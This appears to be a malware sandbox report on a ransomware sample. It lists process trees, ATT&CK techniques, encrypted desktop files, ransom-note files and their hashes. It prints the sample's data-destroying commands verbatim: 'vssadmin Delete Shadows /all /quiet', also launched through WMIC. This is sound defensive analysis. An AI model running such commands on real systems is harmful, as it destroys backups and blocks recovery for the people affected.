C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2808

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2848

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:2836
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:2940
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3028

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2800
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:2916
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3068

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1320

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1444

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4JHWH5IN.txt

Filesize
601B

MD5
117ff5640c25e16c4f7e1c3f6a720ad7

SHA1
e4a4479d93677619263e3754d97a45b1b8129851

SHA256
c3e00ca7518cb2ef388df3c0ad9aff957e917f6d9adb11b59cd1890604a3c41e

SHA512
c842c8918c3396fe3f632126a3d4b2065a36b15e6d27266c1c3c307f5350864a06755a9c02401aa93c7ea3bbdcfe3ab02b075e53e880bfef68d750a7d3bca0aa

Download Submit
C:\Users\Admin\Desktop\CheckpointResume.dxf.xdbbxfvjy

Filesize
296KB

MD5
097f12cd53b5d6933217d463e7b6c7f5

SHA1
ef51c12e0ac20e1a41a37ef35104e32636522036

SHA256
4d101774c2a7e6f0431bb74d25d0226eee4a9b2d93660534b1fb8fb9723a7dda

SHA512
0ebb9e9523fbff6eb82f7093917a544c7a7d83cea1c3578e63faf5e821d5c0adb2ec0e86b66fcabe0f98914960740cf2dbe881f6fac8d2feddc82b5883105f90

Download Submit
C:\Users\Admin\Desktop\ExitNew.js.xdbbxfvjy

Filesize
254KB

MD5
c8a9cced6e8949b96701f1d87f0f65f0

SHA1
3924bdbc2d1110f8a8630ff2dc088f697286f1d3

SHA256
692fe572d57799e96fd3980e60cbaa4f943d67b7ed2aa63fd235e54932a91a33

SHA512
ea653663477aa1662ef848a1230b8b9e858b3ef979277a39173eeb60737a3b1233cb8dd9ef69a4b7e19a34dfced813ecc2ced13e0eeb2b8cc62f17921c9a99a5

Download Submit
C:\Users\Admin\Desktop\ImportClear.jfif.xdbbxfvjy

Filesize
486KB

MD5
9c305ff5908fc309bbe88193b45ba218

SHA1
ce94239e735ecbefe337adbcce2dbe91605f048e

SHA256
2c206b605c88c1eb0178d1e8e51323dc5a21f406a18f2f59a741170b4c86b78c

SHA512
4061c839c9081f00914736897399c2bed66fbd6c779379e6fde37b454cf5bd197b093f9a31e61e6a1ef7e68ecf7dc1184818d812788101e438ad5143c0f1cb35

Download Submit
C:\Users\Admin\Desktop\ReadDismount.xlsx.xdbbxfvjy

Filesize
423KB

MD5
0dca0dad5455110f1fb30a1063125896

SHA1
101004663bb7579d60a11e5f4b2f76c520a928ec

SHA256
892fa71d554da81a82748a2296fa9352c244062df117d49689f68a329ce76cad

SHA512
82c408170f0bf8642071a0cb8111e1053795f797d7c7d5eebc2b74b15b4447905845f2d6a36d15a5a1e1259e7971fbc9e2054eb2cd0820978704c828a0861161

Download Submit
C:\Users\Admin\Desktop\RemoveGet.tiff.xdbbxfvjy

Filesize
592KB

MD5
982eef4e94e038d25cf93fd59e2b5cd6

SHA1
7c978cf8deaea6eb365176758757c17cdf55aa7d

SHA256
c9c7095e7fbbd192eabb5cf892469dcb5c08008125b291a909c3687e615d0e1d

SHA512
8cb2e122237ddfecdc79bac6a0ce6f1fa16f192a6c86e7540b1f12d33fada15a130ef27ba9be7af566ee25a96242869a2bf13e1d261ae4a94de774abea4bf129

Download Submit
C:\Users\Admin\Desktop\RenameInstall.emf.xdbbxfvjy

Filesize
550KB

MD5
f2cd9e70654e806c749f9032325e3da0

SHA1
758c24666f3a9c2d17156cb8fd996dbb5f0e9056

SHA256
869df5b332de7f3dc4c6ea269a89b086cbbc8ec59cf104a457d9cb633f150a1d

SHA512
7220df10896c12ac1c536fce77f5e1a18167f34ccf1898a01cb7c8c3eabdd38e6fefde2adb510b5e0444a66e4f0fad91879d5a4c53b22a00342f84659212207d

Download Submit
C:\Users\Admin\Desktop\RenameUse.bmp.xdbbxfvjy

Filesize
444KB

MD5
a6acdf43e304d4bfac93643942d7476a

SHA1
6505fa8fa7cd5175a23faeec366e822a4a979473

SHA256
3e6687a9f42bf69664abda6074f6e19cb32f5fbb694b17494551b0530991ea11

SHA512
beef8800f312015d431055ee88a45ce03479e174782f675f98a6c4e7ca8aae7ced01c47cddbcfc608690905017adf75deb1c6b8ef6fed8758afb556241aca7a8

Download Submit
C:\Users\Admin\Desktop\UnblockClose.odp.xdbbxfvjy

Filesize
317KB

MD5
a3708c70a9836319299f3b98d5ecfda7

SHA1
c4a5807ee2f1a10cae95e991c5d9af7252ec9d7f

SHA256
613892f8e68f9006f852a0dfbf8269dc04a689f534438003fbc06217d5bfdc1c

SHA512
c633e7f404495d62b41e3ec149fd894721a2633fd179e63b8e6ab3aac8fb7980c1d4e7d0c2f4f6f3b256b97d026ed82d501d6814fd090a70f188ee05f4685b66

Download Submit
C:\Users\Admin\Desktop\readme.txt

Filesize
1KB

MD5
3c734300847854c64be9decf8d1e088e

SHA1
306e8ccbed03800ad1db14123fa513d7ab7a2b37

SHA256
bbc56ddafc3b7d83f7f76aabf985febb983deed05acfd6eea07c4c996890c604

SHA512
cd2d4663b5974763fdfc2a679604810ba92f3f8b2f08a654ada5ea1898c716172b67874093192cf7534cd38a01e48cf8d540eb6779df5befeb983ddf706d56e1

Download Submit
C:\Users\Admin\Desktop\readme.txt

Filesize
1KB

MD5
3c734300847854c64be9decf8d1e088e

SHA1
306e8ccbed03800ad1db14123fa513d7ab7a2b37

SHA256
bbc56ddafc3b7d83f7f76aabf985febb983deed05acfd6eea07c4c996890c604

SHA512
cd2d4663b5974763fdfc2a679604810ba92f3f8b2f08a654ada5ea1898c716172b67874093192cf7534cd38a01e48cf8d540eb6779df5befeb983ddf706d56e1

Download Submit
C:\Users\Public\readme.txt

Filesize
1KB

MD5
3c734300847854c64be9decf8d1e088e

SHA1
306e8ccbed03800ad1db14123fa513d7ab7a2b37

SHA256
bbc56ddafc3b7d83f7f76aabf985febb983deed05acfd6eea07c4c996890c604

SHA512
cd2d4663b5974763fdfc2a679604810ba92f3f8b2f08a654ada5ea1898c716172b67874093192cf7534cd38a01e48cf8d540eb6779df5befeb983ddf706d56e1

Download Submit
memory/756-64-0x000007FEFB771000-0x000007FEFB773000-memory.dmp

Filesize
8KB

Download
memory/1124-55-0x00000000001D0000-0x00000000001D5000-memory.dmp

Filesize
20KB

Download
memory/1980-54-0x0000000000090000-0x0000000000095000-memory.dmp

Filesize
20KB

Download